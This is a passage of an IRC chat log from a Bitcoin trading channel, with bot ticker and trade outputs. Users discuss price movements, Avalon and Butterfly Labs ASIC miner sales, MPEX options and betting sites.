total. | Data vintage: 0.0021 seconds Mar 25 09:37:48 lost 1000 on the weekend, good news... Mar 25 09:38:17 ? Mar 25 09:40:13 either someone bought into the walls or they were taken down by 1000 coins since like 8 hours ago Mar 25 09:40:32 makes me all bullish inside my special placez Mar 25 09:43:09 uh... not sure what's going on exactly but eh Mar 25 09:43:23 :) Mar 25 09:43:40 You lost 1000 BTC? I hope not. Maybe USD? Mar 25 09:43:50 no no Mar 25 09:43:58 the asks lost 1000 btc under 75 Mar 25 09:44:03 oh Mar 25 09:44:05 right Mar 25 09:44:07 price moving up Mar 25 09:44:20 there's two big walls left Mar 25 09:46:06 yeah but we are moving in the right direction, and it still weekend sorta Mar 25 09:47:54 yeah Mar 25 09:48:02 Well I doubt these walls will hold Mar 25 09:48:20 i doubt 48 hours, unless we crash Mar 25 09:53:19 loaded is hinting at a european client Mar 25 09:57:13 All right, for those of you who like to gamble, batch 3 will open in a few hours Mar 25 09:57:34 I will take a look at whats going on.. but i wont buy Mar 25 10:09:52 ;;bc,nethash Mar 25 10:09:55 55107.853568001425 Mar 25 10:13:56 anyway. from 88 - 115 to 75 Mar 25 10:14:07 avalon pricing is an exercise in pulling numbrrs out of ass Mar 25 10:16:14 they could charge anything and people will buy them Mar 25 10:16:32 Where's topace seriously... Mar 25 10:21:18 https://bitcointalk.org/index.php?topic=157789.msg1670399#msg1670399 Mar 25 10:21:22 lmao check out the junior members Mar 25 11:07:02 0 Mar 25 11:47:34 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [-] Mar 25 11:48:13 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [-] Mar 25 11:48:15 [BTCTC] [ASICMINER-PT] 1 @ 0.79802 BTC [-] Mar 25 11:48:17 [BTCTC] [ASICMINER-PT] 4 @ 0.79801 = 3.192 BTC [-] Mar 25 11:48:19 [BTCTC] [ASICMINER-PT] 5 @ 0.798 = 3.99 BTC [-] Mar 25 11:48:21 [BTCTC] [ASICMINER-PT] 3 @ 0.7925 = 2.3775 BTC [-] Mar 25 11:49:01 [BTCTC] [ASICMINER-PT] 1 @ 0.7925 BTC [-] Mar 25 11:58:04 [MPEX] [S.MPOE] 5934 @ 0.00065033 = 3.8591 BTC [-] Mar 25 11:59:18 [BTCTC] [S.DICE-PT] 96 @ 0.00438 = 0.4205 BTC [+] Mar 25 11:59:52 [BTCTC] [S.DICE-PT] 19 @ 0.004395 = 0.0835 BTC [+] Mar 25 12:00:31 [BTCTC] [S.DICE-PT] 435 @ 0.00465 = 2.0228 BTC [+] Mar 25 12:00:45 [BTCTC] [S.DICE-PT] 139 @ 0.00469 = 0.6519 BTC [+] Mar 25 12:06:19 [BTCTC] [BTC-TRADING-PT] 1 @ 0.17639 BTC [+] Mar 25 12:06:22 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1764 BTC [+] Mar 25 12:11:59 [HAVELOCK] [SDICE] 1 @ 0.501 BTC [-] Mar 25 12:27:54 [MPEX] [S.MPOE] 4304 @ 0.00065033 = 2.799 BTC [-] Mar 25 12:27:56 [MPEX] [S.MPOE] 19900 @ 0.00065024 = 12.9398 BTC [-] Mar 25 12:27:57 [MPEX] [S.MPOE] 596 @ 0.00064326 = 0.3834 BTC [-] Mar 25 12:29:49 [BTCTC] [ASICMINER-PT] 1 @ 0.7813 BTC [-] Mar 25 12:29:51 [BTCTC] [ASICMINER-PT] 1 @ 0.781 BTC [-] Mar 25 12:29:54 [BTCTC] [ASICMINER-PT] 6 @ 0.78 = 4.68 BTC [-] Mar 25 12:34:47 [BTCTC] [ASICMINER-PT] 21 @ 0.78 = 16.38 BTC [-] Mar 25 12:35:41 [BTCTC] [ASICMINER-PT] 73 @ 0.78 = 56.94 BTC [-] Mar 25 12:44:13 ;;ticker Mar 25 12:44:14 BTCUSD ticker | Best bid: 72.45383, Best ask: 72.88999, Bid-ask spread: 0.43616, Last trade: 72.45383, 24 hour volume: 43903.14440387, 24 hour low: 67.00001, 24 hour high: 72.93495, 24 hour vwap: 70.83011 Mar 25 12:45:49 so we're back to that now? Mar 25 12:47:25 yes Mar 25 12:47:33 Possibly breaking 75 and running up to 100 Mar 25 12:48:00 call it reloaded™ ;) Mar 25 12:48:44 I'm not sure I like the fact it's happening... Mar 25 12:53:20 what makes you think $100 Mar 25 12:55:58 Actually I don't think we can go to or over the line. Mar 25 12:56:30 But price tends to move and stop at round numbers. Mar 25 12:59:11 [BTCTC] [ASICMINER-PT] 1 @ 0.804 BTC [+] Mar 25 13:18:16 [BTCTC] [ASICMINER-PT] 1 @ 0.809 BTC [+] Mar 25 13:19:04 hmm, i like it better at .085 Mar 25 13:19:17 wonder why it is going down with avalon and bfl fail Mar 25 13:22:19 [BTCTC] [ASICMINER-PT] 1 @ 0.819 BTC [+] Mar 25 13:22:43 well this is the right direction atleast:) Mar 25 13:32:11 what happened to avalon bet Mar 25 13:33:36 seems like it got removed Mar 25 13:34:05 ;;ticker Mar 25 13:34:05 BTCUSD ticker | Best bid: 72.30372, Best ask: 72.69999, Bid-ask spread: 0.39627, Last trade: 72.30372, 24 hour volume: 46499.99170688, 24 hour low: 67.00001, 24 hour high: 73.00000, 24 hour vwap: 70.99670 Mar 25 13:38:26 [BTCTC] [GSDPT] 15 @ 0.00439 = 0.0659 BTC [+] Mar 25 13:43:15 ;;ticker Mar 25 13:43:15 BTCUSD ticker | Best bid: 72.21001, Best ask: 72.69999, Bid-ask spread: 0.48998, Last trade: 72.21000, 24 hour volume: 46190.13268606, 24 hour low: 67.00001, 24 hour high: 73.00000, 24 hour vwap: 71.02465 Mar 25 13:46:29 [BTCTC] [ASICMINER-PT] 1 @ 0.81 BTC [-] Mar 25 13:46:39 [MPEX] [S.MPOE] 1900 @ 0.00064326 = 1.2222 BTC [-] Mar 25 13:56:29 [BTCTC] [S.DICE-PT] 2 @ 0.0047 = 0.0094 BTC [+] Mar 25 13:58:01 [BTCTC] [ASICMINER-PT] 1 @ 0.81 BTC [-] Mar 25 14:03:04 http://news.goldseek.com/GoldSeek/1364140800.php ftw Mar 25 14:03:13 lol let's call them by right name: cartel currencies! Mar 25 14:17:15 so, another ddos that took out mpex.coinbr.com by shrapnel, too... Mar 25 14:17:31 beefed it up, waiting what comes next Mar 25 14:23:35 [MPEX] [S.MPOE] 5004 @ 0.00064326 = 3.2189 BTC [-] Mar 25 14:23:37 [MPEX] [S.MPOE] 8200 @ 0.00064295 = 5.2722 BTC [-] Mar 25 14:23:40 [MPEX] [S.MPOE] 19450 @ 0.00063865 = 12.4217 BTC [-] Mar 25 14:23:42 [MPEX] [S.MPOE] 17946 @ 0.00063656 = 11.4237 BTC [-] Mar 25 14:41:02 shouldn't the avalon store open now? Mar 25 14:48:04 ah it seems to work Mar 25 15:02:46 damientrog: did you get one? they're already sold out Mar 25 15:03:04 I got a confirmation Mar 25 15:03:18 i missed batch 2 by a few minutes and yet I was ready to spend 4X as much to get in on this one Mar 25 15:03:22 looks like i just missed it too Mar 25 15:03:31 and payed a lot of money Mar 25 15:03:35 congrats to you if you made it! Mar 25 15:03:58 thanks Mar 25 15:03:58 yeah at least the dropped it from 88 to 72 BTC Mar 25 15:11:25 aww Mar 25 15:27:09 is bitbet.us down? Mar 25 15:27:13 nope, just slow. Mar 25 15:27:42 [MPEX] [S.MPOE] 18350 @ 0.00063802 = 11.7077 BTC [+] Mar 25 15:27:44 [MPEX] [S.MPOE] 3500 @ 0.00064993 = 2.2748 BTC [+] Mar 25 15:42:20 ;;bc,stats Mar 25 15:42:23 Current Blocks: 227960 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1863 blocks | Next Difficulty In About: 1 week, 6 days, 5 hours, 6 minutes, and 22 seconds | Next Difficulty Estimate: 6715661.70839 | Estimated Percent Change: 0.29624 Mar 25 15:45:53 seems avalon sold out Mar 25 15:45:55 within 30 mins Mar 25 15:46:14 k, thats way worse than my 24 hour prediction Mar 25 15:46:17 shoulda said within 1 hr Mar 25 15:46:53 thats 300 units at 72btc was it? Mar 25 15:47:29 500 Mar 25 15:47:47 at either 72 BTC each, or 100 BTC for 4 modules Mar 25 15:48:08 i wish i got an option for 4 modules on batch 2 Mar 25 15:49:23 http://i0.kym-cdn.com/photos/images/newsfeed/000/131/288/spongebob-butthurt.gif Mar 25 15:49:34 someone's ranting on forums that they couldnt buy lol Mar 25 15:50:38 its just so amazing that BFL really is not shipping yet Mar 25 15:50:51 we need more asic suppliers Mar 25 15:51:59 [HAVELOCK] [SDICE] 2 @ 0.50500001 = 1.01 BTC [+] Mar 25 15:52:00 [HAVELOCK] [SDICE] 2 @ 0.505 = 1.01 BTC [-] Mar 25 15:52:01 micon is the winner of the bet Mar 25 15:52:02 [HAVELOCK] [SDICE] 4 @ 0.501 = 2.004 BTC [-] Mar 25 15:52:03 [HAVELOCK] [SDICE] 2 @ 0.4905 = 0.981 BTC [-] Mar 25 15:52:07 the whole thing is a scam Mar 25 15:52:28 there is apparently a new asic supplier Mar 25 15:52:38 shipping fall/winter Mar 25 15:53:02 https://bitcointalk.org/index.php?topic=158044.0 Mar 25 15:53:07 that Helveticoin thing? Mar 25 15:53:20 oh anothernother one Mar 25 15:54:23 another one Mar 25 15:54:27 this one is prolly a scam Mar 25 15:54:33 anyone got batch 3? Mar 25 15:54:48 I considered it, but I have batch 2 incoming.. Mar 25 15:54:55 i dont want to be too greedy Mar 25 15:56:29 ;;ticker Mar 25 15:56:29 BTCUSD ticker | Best bid: 72.90001, Best ask: 73.01000, Bid-ask spread: 0.10999, Last trade: 73.01000, 24 hour volume: 50819.94621131, 24 hour low: 67.45000, 24 hour high: 73.01000, 24 hour vwap: 71.34375 Mar 25 15:56:53 Bowjob when do you expect it to arrive? Mar 25 15:57:08 my batch two will arrive in the middle of may Mar 25 15:57:36 batch 3 will arrive at the beginning of july Mar 25 15:57:36 !ticker h sdice Mar 25 15:57:37 [HAVELOCK:SDICE] 1D: 0.49050000 / 0.51929412 / 0.53000000 (68 shares, 35.31199991 BTC), 7D: 0.40000000 / 0.48153116 / 0.53200000 (1169 shares, 562.90992223 BTC), 30D: 0.37000000 / 0.55362601 / 0.69400000 (5727 shares, 3170.61617943 BTC) Mar 25 15:57:44 !ticker h vtx Mar 25 15:57:45 [HAVELOCK:VTX] 1D: 0.63210000 / 0.74049568 / 0.77980000 (176 shares, 130.32723989 BTC), 7D: 0.38280000 / 0.41016687 / 0.77980000 (10816 shares, 4436.36481305 BTC), 30D: 0.38280000 / 0.41016687 / 0.77980000 (10816 shares, 4436.36481305 BTC) Mar 25 15:57:46 That'll probably still beat my BFL order from last Nov. Mar 25 15:57:53 yes of course Mar 25 15:58:06 How much was it in Batch 2? Mar 25 15:58:17 37500 BTC at least were put into batch 3 Mar 25 15:58:29 that is not some easy number in BTC land.. Mar 25 15:58:35 they are betting BFL wont ship Mar 25 15:58:39 500 units Mar 25 15:58:51 snapped in 30 mins... i gave third batch 24 hours.. damn Mar 25 15:59:41 how much u paid for bfl? Mar 25 16:00:05 $1299 USD was 106 BTC back in Nov. Mar 25 16:00:21 Are you sure it's against the rules to slap myself here? Mar 25 16:00:44 yikes. you could afford about 2 Avalons Mar 25 16:00:52 i only paid 56 BTC for my avalon 2 Mar 25 16:01:12 Would you like a co-investor in your batch 2? I could hedge my BFL exposure that way. Mar 25 16:01:24 hehe Mar 25 16:01:29 nty, :P Mar 25 16:01:51 i believe if BFL ships, their capacity would be so limited Mar 25 16:01:51 i will gladly lend you 50btc today for 500btc tomorrow Mar 25 16:02:46 what you could hedge with is this.. http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Mar 25 16:03:30 though it seems BFL investors are losing hope Mar 25 16:03:36 [MPEX] [S.DICE] 2900 @ 0.00449999 = 13.05 BTC [-] Mar 25 16:03:44 It's always darkest before the meteor strikes. Mar 25 16:04:51 so you ordered in nov Mar 25 16:04:58 why does that print sometimes show [-] when it should be [+]? Mar 25 16:04:59 [HAVELOCK] [SDICE] 2 @ 0.4905 = 0.981 BTC [-] Mar 25 16:05:00 [HAVELOCK] [SDICE] 1 @ 0.49 BTC [-] Mar 25 16:05:01 [HAVELOCK] [SDICE] 3 @ 0.45005 = 1.3502 BTC [-] Mar 25 16:05:02 [HAVELOCK] [SDICE] 10 @ 0.450001 = 4.5 BTC [-] Mar 25 16:05:02 [HAVELOCK] [SDICE] 13 @ 0.45 = 5.85 BTC [-] Mar 25 16:05:27 Yep, so I'll be way after other BFL deliveries. Mar 25 16:05:38 I'm *that* full of win. Mar 25 16:06:02 i had a bfl order, but cancelled it earlier this year Mar 25 16:06:11 bought BTC instead Mar 25 16:06:12 You did well Mar 25 16:06:29 what happened to the Avalon batch 1 bet on bitbet? Mar 25 16:07:02 boom bye bye wall Mar 25 16:07:08 i thought mp closed it since he lost.. Mar 25 16:07:12 someone here using sierra charts? Mar 25 16:07:19 because it was sorta ambigous.. he bet on np Mar 25 16:07:26 is it possible to show volume in bitcoins and not in ticks Mar 25 16:07:26 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Mar 25 16:07:29 its pending, actually Mar 25 16:07:35 thank satoshi.. Mar 25 16:07:48 if that bet gets canned, its a red flag Mar 25 16:07:53 is satoshi one of the original developers? Mar 25 16:07:54 conflict of interest Mar 25 16:08:01 yes Mar 25 16:08:12 I got mine delivered today Mar 25 16:08:13 and he runs the dice game? or is that just in honor of him Mar 25 16:08:21 I bet 3 btc Mar 25 16:08:27 its a marketing ploy Mar 25 16:08:39 satoshi has nothing to do with s.dice Mar 25 16:08:44 ic Mar 25 16:08:55 btc breaking out btw ;) Mar 25 16:09:00 ;;ticker Mar 25 16:09:01 BTCUSD ticker | Best bid: 74.86254, Best ask: 74.88766, Bid-ask spread: 0.02512, Last trade: 74.86254, 24 hour volume: 56982.87826385, 24 hour low: 67.45000, 24 hour high: 74.86254, 24 hour vwap: 71.58647 Mar 25 16:09:05 nice Mar 25 16:09:11 ;;asks 80 Mar 25 16:09:14 There are currently 12350.322 bitcoins offered at or under 80.0 USD, worth 941216.151012 USD in total. | Data vintage: 0.0022 seconds Mar 25 16:09:16 ;;bids 70 Mar 25 16:09:16 There are currently 6557.6808 bitcoins demanded at or over 70.0 USD, worth 467816.87006 USD in total. | Data vintage: 2.4252 seconds Mar 25 16:09:22 ;;asks 90 Mar 25 16:09:22 There are currently 18442.798 bitcoins offered at or under 90.0 USD, worth 1460512.2211 USD in total. | Data vintage: 7.6800 seconds Mar 25 16:09:29 lol a zig zag to be enjoyed throughly Mar 25 16:09:37 ;;bids 60 Mar 25 16:09:37 There are currently 31425.905 bitcoins demanded at or over 60.0 USD, worth 2089676.87999 USD in total. | Data vintage: 23.4083 seconds Mar 25 16:09:43 i'm with y'all Mar 25 16:09:53 where is that chart from BFL.. about the shipping dates Mar 25 16:11:17 "The currently estimated shipping time frame if you were to order today is the end of April or Beginning of May. This is just an estimate, and until we know how many units we can produce per day and specifically when the bulk of our chips will be ready, we can't give a more accurate estimate." Mar 25 16:11:21 hahahahahhahahaahaahah Mar 25 16:11:29 according to josh Mar 25 16:11:46 lol Mar 25 16:11:55 bfl has been entertaining from the start Mar 25 16:12:18 can someone post that chart about bfl shipment Mar 25 16:12:26 like, if u ordered back in june or something Mar 25 16:12:37 i swear i saw one.. cant find it Mar 25 16:12:43 [BTCTC] [BTC-BOND] 5 @ 0.009899 = 0.0495 BTC [+] Mar 25 16:12:56 i dont recall any gfx Mar 25 16:13:15 here's a summary page https://forums.butterflylabs.com/bfl-forum-miscellaneous/1099-orders-shipping-pictures-facility-when-my-stuff-here-why-delays-shipping.html Mar 25 16:13:18 [MPEX] [O.BTCUSD.C750T] 6 @ 0.05500538 = 0.33 BTC [+] Mar 25 16:14:49 this one has a bunch of dates https://forums.butterflylabs.com/announcements/692-bfl-asic-status.html Mar 25 16:15:06 [BTCTC] [PAJKA.BOND] 5 @ 0.09 = 0.45 BTC [-] Mar 25 16:15:34 [BTCTC] [PAJKA.BOND] 5 @ 0.105 = 0.525 BTC [+] Mar 25 16:15:42 not that unfortunatel Mar 25 16:15:48 i give up Mar 25 16:16:05 basically, someone who ordered in nov, according to the "chart" will recieve theirs may Mar 25 16:16:08 irrc Mar 25 16:16:20 its all nonsense at this point anyway Mar 25 16:16:43 they need to ship 1 unit before any dates matter at all Mar 25 16:16:44 but we know thats bullshit because bfl's chart says those who preordered first would get theirs feb or march Mar 25 16:16:55 avalon 3 will ship first Mar 25 16:17:08 37,500 BTC says so Mar 25 16:17:09 not me Mar 25 16:17:12 but the BTC does Mar 25 16:17:51 ;;ticker Mar 25 16:17:52 BTCUSD ticker | Best bid: 74.75000, Best ask: 74.80000, Bid-ask spread: 0.05000, Last trade: 74.00000, 24 hour volume: 57944.78653082, 24 hour low: 67.47000, 24 hour high: 74.90000, 24 hour vwap: 71.65377 Mar 25 16:17:58 ;;goxlag Mar 25 16:17:59 4.549039 seconds Mar 25 16:18:14 Ooh! Mar 25 16:18:15 http://store.avalon-asics.com/?product=avalon-asic-unit Mar 25 16:18:18 its on stock again Mar 25 16:18:26 it seems they limit the stock so that it wont get ddosed Mar 25 16:18:57 any idea how many actually sold? Mar 25 16:19:10 i would imagine a nice round number Mar 25 16:19:10 100 Mar 25 16:19:13 or 50 Mar 25 16:19:26 500 units will be available Mar 25 16:19:31 then again it could be 250 units too Mar 25 16:20:00 tempted, but i dont thinki could handle the stress of waiting Mar 25 16:20:34 safer with BTC in your own wallet. Mar 25 16:20:48 i bought the majority of my btc dec, 2012 Mar 25 16:20:54 so.. its okay with me Mar 25 16:25:53 yeah, if you can risk it, probably isn't a bad idea. are you going to pull the trigger on an avalon? Mar 25 16:30:41 [MPEX] [O.BTCUSD.C750T] 6 @ 0.05510357 = 0.3306 BTC [+] Mar 25 16:33:51 http://www.reddit.com/r/Bitcoin/comments/1ayykn/avalon_asic_batch_3_sold_out/ Mar 25 16:33:52 [BTCTC] [ASICMINER-PT] 20 @ 0.80998 = 16.1996 BTC [-] Mar 25 16:33:54 O_O Mar 25 16:34:13 [BTCTC] [ASICMINER-PT] 6 @ 0.81 = 4.86 BTC [+] Mar 25 16:34:59 [BTCTC] [ASICMINER-PT] 5 @ 0.819 = 4.095 BTC [+] Mar 25 16:35:47 oh so it wasnt sold out? Mar 25 16:36:37 it just says sold out from time to time Mar 25 16:36:47 because they learned from batch 1 and 2 ordering Mar 25 16:36:51 [MPEX] [O.BTCUSD.C750T] 5 @ 0.05516855 = 0.2758 BTC [+] Mar 25 16:36:55 so maybe 100 units per session Mar 25 16:37:09 it will still sell out in 24 hours like i predicted Mar 25 16:37:33 heh Mar 25 16:37:35 naive people Mar 25 16:40:35 all time high Mar 25 16:40:48 [BTCTC] [B.YABMC] 1 @ 0.01573 BTC [-] Mar 25 16:41:11 ;;ticker Mar 25 16:41:11 BTCUSD ticker | Best bid: 74.54000, Best ask: 74.97900, Bid-ask spread: 0.43900, Last trade: 74.95000, 24 hour volume: 59306.49047898, 24 hour low: 67.47001, 24 hour high: 74.95000, 24 hour vwap: 71.73076 Mar 25 16:41:15 jesus 101.14 BTC for 4 mod w/atx (85gh)?! Mar 25 16:41:21 why the huge jump in price? Mar 25 16:41:44 make money money money Mar 25 16:42:05 people will pay the price it seems Mar 25 16:42:08 if they do Mar 25 16:42:16 then Avaon is pretty damn smart Mar 25 16:42:30 wtf is going on with bfl? no update in a week and a half? Mar 25 16:42:38 no update til Wed i think Mar 25 16:42:40 still "having problems with the test rig" ?? Mar 25 16:42:55 the high price is because it will give 100% roi in about a month Mar 25 16:42:59 yeah they are having problems letting go of it and mining themselves Mar 25 16:43:09 if you multiply the current diff twice today Mar 25 16:43:12 so about 12 mil Mar 25 16:43:16 its still a good buy Mar 25 16:43:30 i still dont think bfl will ship anytime soon Mar 25 16:43:56 so apparently the cause of delay is the ATX Mar 25 16:44:08 .. if it makes my shipment faster, I can do away with the ATX Mar 25 16:45:13 [MPEX] [S.MPOE] 13900 @ 0.00064713 = 8.9951 BTC [-] Mar 25 16:47:56 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [-] Mar 25 16:48:38 I recall josh saying the BFL bet for march 1 was gonna be a close one Mar 25 16:48:41 what a liar. Mar 25 16:48:49 [MPEX] [O.BTCUSD.C750T] 5 @ 0.05539952 = 0.277 BTC [+] Mar 25 16:48:51 [BTCTC] [B.YABMC] 1 @ 0.01301 BTC [-] Mar 25 16:49:30 [BTCTC] [B.YABMC] 1 @ 0.008501 BTC [-] Mar 25 16:49:57 ATH Mar 25 16:50:00 ;;ticker Mar 25 16:50:00 BTCUSD ticker | Best bid: 74.89684, Best ask: 75.00000, Bid-ask spread: 0.10316, Last trade: 75.00000, 24 hour volume: 59971.91411337, 24 hour low: 67.75000, 24 hour high: 75.00000, 24 hour vwap: 71.88882 Mar 25 16:50:48 ;;goxlag Mar 25 16:50:49 6.927344 seconds Mar 25 16:55:11 ;;asks 79.99 Mar 25 16:55:11 There are currently 9405.6834 bitcoins offered at or under 79.99 USD, worth 717701.616018 USD in total. | Data vintage: 82.2281 seconds Mar 25 16:55:20 bids 60.01 Mar 25 16:55:28 ;;bids 60.01 Mar 25 16:55:28 There are currently 29884.514 bitcoins demanded at or over 60.01 USD, worth 1996044.82564 USD in total. | Data vintage: 99.5886 seconds Mar 25 16:55:42 ;;bids 70.01 Mar 25 16:55:43 There are currently 5620.2676 bitcoins demanded at or over 70.01 USD, worth 404970.347737 USD in total. | Data vintage: 114.1587 seconds Mar 25 16:55:52 still shallow Mar 25 16:56:57 ;;ticker Mar 25 16:56:57 BTCUSD ticker | Best bid: 74.99994, Best ask: 75.00000, Bid-ask spread: 0.00006, Last trade: 75.00000, 24 hour volume: 61675.20387455, 24 hour low: 67.75000, 24 hour high: 75.00000, 24 hour vwap: 71.98374 Mar 25 16:57:32 [MPEX] [O.BTCUSD.C750T] 6 @ 0.07419275 = 0.4452 BTC [+] Mar 25 16:57:54 [MPEX] [O.BTCUSD.C730T] 5 @ 0.08759408 = 0.438 BTC [+] Mar 25 16:58:55 Is the MPOE bot tapped out Mar 25 16:58:59 I want moar Mar 25 17:00:31 NEEED MORE CALLS Mar 25 17:00:35 COME BACK MPOEBOT Mar 25 17:01:29 needs to borrow more money Mar 25 17:01:32 :P Mar 25 17:01:40 ;;goxlag Mar 25 17:01:41 33.493863 seconds Mar 25 17:01:47 there it goes Mar 25 17:01:50 ;;ticker Mar 25 17:01:51 BTCUSD ticker | Best bid: 75.00000, Best ask: 75.00100, Bid-ask spread: 0.00100, Last trade: 75.00000, 24 hour volume: 64448.06308381, 24 hour low: 68.50000, 24 hour high: 75.00000, 24 hour vwap: 72.15001 Mar 25 17:01:58 gox freezing price at 75 Mar 25 17:02:09 with suggested bid Mar 25 17:02:10 bids are really hungry Mar 25 17:02:12 :) Mar 25 17:02:17 it ate through Mar 25 17:02:19 ;;ticker Mar 25 17:02:19 BTCUSD ticker | Best bid: 75.00000, Best ask: 75.25000, Bid-ask spread: 0.25000, Last trade: 75.25000, 24 hour volume: 64448.06308381, 24 hour low: 68.50000, 24 hour high: 75.00000, 24 hour vwap: 72.15001 Mar 25 17:02:22 gox just freezing. Mar 25 17:02:28 ;;goxlag Mar 25 17:02:29 41.06127 seconds Mar 25 17:02:30 ;;ticker Mar 25 17:02:31 BTCUSD ticker | Best bid: 75.00000, Best ask: 75.41000, Bid-ask spread: 0.41000, Last trade: 75.41000, 24 hour volume: 64448.06308381, 24 hour low: 68.50000, 24 hour high: 75.00000, 24 hour vwap: 72.15001 Mar 25 17:02:32 fuck i need more calls Mar 25 17:02:48 MPOE bot is sold out I guess. Mar 25 17:03:28 http://farm4.static.flickr.com/3070/2789654119_4203f8e3e4.jpg Mar 25 17:03:28 I only have 3000 calls :( Mar 25 17:03:33 This explains a lot Mar 25 17:03:48 bitcoinity should flash that photo Mar 25 17:03:52 is there an mpex options faq? Mar 25 17:03:59 Bugpowder where at Mar 25 17:04:03 will stop around 76 Mar 25 17:04:20 for a moment Mar 25 17:04:24 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.05878437 = 58.7844 BTC [-] Mar 25 17:04:40 nevermind Mar 25 17:04:41 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.0724339 = 72.4339 BTC [-] Mar 25 17:04:49 got moar Mar 25 17:05:21 If you will recall, last night I predicted we would break thru 75 between 15:00 and 15:30 today. Mar 25 17:05:47 remember what happened last time you tried to time the market... Mar 25 17:05:55 lol Mar 25 17:06:07 what happened Mar 25 17:06:09 gox suggested price stil frozen at 75 Mar 25 17:06:15 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.0884358 = 88.4358 BTC Mar 25 17:06:21 ;;goxlag Mar 25 17:06:22 87.806482 seconds Mar 25 17:06:35 !ticker m ^OIX Mar 25 17:06:37 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.26732239 / 69.81455463 / 71.07386247 (27706 shares, 6,570.16 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 25 17:06:39 thestringpuller: I made a shitload Mar 25 17:07:00 what about that time did a straddle Mar 25 17:07:23 that was not the last time Mar 25 17:07:29 lol Mar 25 17:07:38 most of my put strategies have been disasterous Mar 25 17:07:46 yah Mar 25 17:07:49 okay maybe not :) Mar 25 17:07:59 ;;asks 80 Mar 25 17:08:00 There are currently 4840.9168 bitcoins offered at or under 80.0 USD, worth 380818.295732 USD in total. | Data vintage: 96.6348 seconds Mar 25 17:08:14 ;;bids 74 Mar 25 17:08:14 There are currently 943.62198 bitcoins demanded at or over 74.0 USD, worth 70879.543115 USD in total. | Data vintage: 111.1004 seconds Mar 25 17:08:23 wow Mar 25 17:08:24 ;;bids 70 Mar 25 17:08:26 we'll reach 100 in early april Mar 25 17:08:27 There are currently 5820.2281 bitcoins demanded at or over 70.0 USD, worth 418623.359516 USD in total. | Data vintage: 0.0068 seconds Mar 25 17:08:28 quite the move despite that imbalance Mar 25 17:08:41 well alright not that much Mar 25 17:08:49 Bowjob we will hit 96 this week Mar 25 17:08:49 lol more money movin into gox Mar 25 17:08:49 80 today Mar 25 17:08:50 ez Mar 25 17:08:51 I hope :) Mar 25 17:08:54 miners start ya engines Mar 25 17:08:56 77? Mar 25 17:08:59 we will Mar 25 17:09:01 I dunno about 100 Mar 25 17:09:04 i wish i have an mpex account Mar 25 17:09:05 lol Mar 25 17:09:14 why not use coiner? Mar 25 17:09:16 Powda Mar 25 17:09:19 coinbr? Mar 25 17:09:19 ;;ticker Mar 25 17:09:19 BTCUSD ticker | Best bid: 76.00000, Best ask: 76.80000, Bid-ask spread: 0.80000, Last trade: 76.00000, 24 hour volume: 64448.06308381, 24 hour low: 68.50000, 24 hour high: 75.00000, 24 hour vwap: 72.15001 Mar 25 17:09:24 can coinbr do options? Mar 25 17:09:26 !ticker m S.MPOE Mar 25 17:09:27 [MPEX:S.MPOE] 1D: 0.00063656 / 0.00065889 / 0.00068342 (339572 shares, 223.74 BTC), 7D: 0.00063656 / 0.00070239 / 0.00077505 (2216783 shares, 1,557.07 BTC), 30D: 0.00061614 / 0.00072046 / 0.00078628 (32186956 shares, 23,189.72 BTC) Mar 25 17:09:28 yes Mar 25 17:09:37 wtf i didnt know that Mar 25 17:09:39 coinbr Mar 25 17:09:40 lol Mar 25 17:09:43 kk Mar 25 17:09:44 what do you think mpoe bot will make this month? Mar 25 17:09:47 -20000 Mar 25 17:09:55 :( Mar 25 17:09:56 seriously Mar 25 17:09:58 but iw ont panick buy right now Mar 25 17:09:58 lol Mar 25 17:10:09 bondholders are gonna take hit Mar 25 17:10:09 maybe -10000 Mar 25 17:10:23 is there an MPex Options FAQ? Mar 25 17:10:41 there is a deep explaination by MPOE-PR on the forum Mar 25 17:10:51 if you have any specific questions I can answer Mar 25 17:10:55 MPOE stock will plummet then... Mar 25 17:10:59 I told my friends and fam about bitcoin Mar 25 17:11:03 it already is trading down Mar 25 17:11:06 parents are interested in it.. Mar 25 17:11:14 my friends are "meh" about it Mar 25 17:11:16 people may roll into S.DICE (I hope). Mar 25 17:11:22 yea until the earnings comes out. Mar 25 17:11:34 how do you know such a huge loss? Mar 25 17:11:38 76? :) Mar 25 17:11:41 basically i conceptually understand options, but not totally clear on which ones represent what on mpex Mar 25 17:11:43 i fucking love monday Mar 25 17:11:52 ;;ticker Mar 25 17:11:53 BTCUSD ticker | Best bid: 76.01234, Best ask: 76.90000, Bid-ask spread: 0.88766, Last trade: 76.01234, 24 hour volume: 64448.06308381, 24 hour low: 68.50000, 24 hour high: 75.00000, 24 hour vwap: 72.15001 Mar 25 17:12:01 it hit 77 according to clarkmoody Mar 25 17:12:03 [MPEX] [O.BTCUSD.C750T] 5 @ 0.06012379 = 0.3006 BTC [+] Mar 25 17:12:05 i should have bought calls Mar 25 17:12:21 i really thought about it Mar 25 17:12:25 well i guess I still can Mar 25 17:12:36 hey mr. powda Mar 25 17:12:37 i talked to mp about is 75 calls Mar 25 17:12:50 could you proxy calls to smickles for me? Mar 25 17:12:52 i did not buy Mar 25 17:12:58 not many Mar 25 17:13:07 i dont have an account, i refused the free one offered to me Mar 25 17:13:23 that was @ Bugpowder Mar 25 17:13:28 ok Mar 25 17:13:35 77.2 Mar 25 17:13:42 !ticker m ^OIX Mar 25 17:13:43 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.26732239 / 69.81663654 / 71.0760242 (27711 shares, 6,570.46 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 25 17:13:58 sure Mar 25 17:14:00 ;;bc,24prc Mar 25 17:14:01 Error: "bc,24prc" is not a valid command. Mar 25 17:14:09 [MPEX] [O.BTCUSD.C750T] 5 @ 0.0595729 = 0.2979 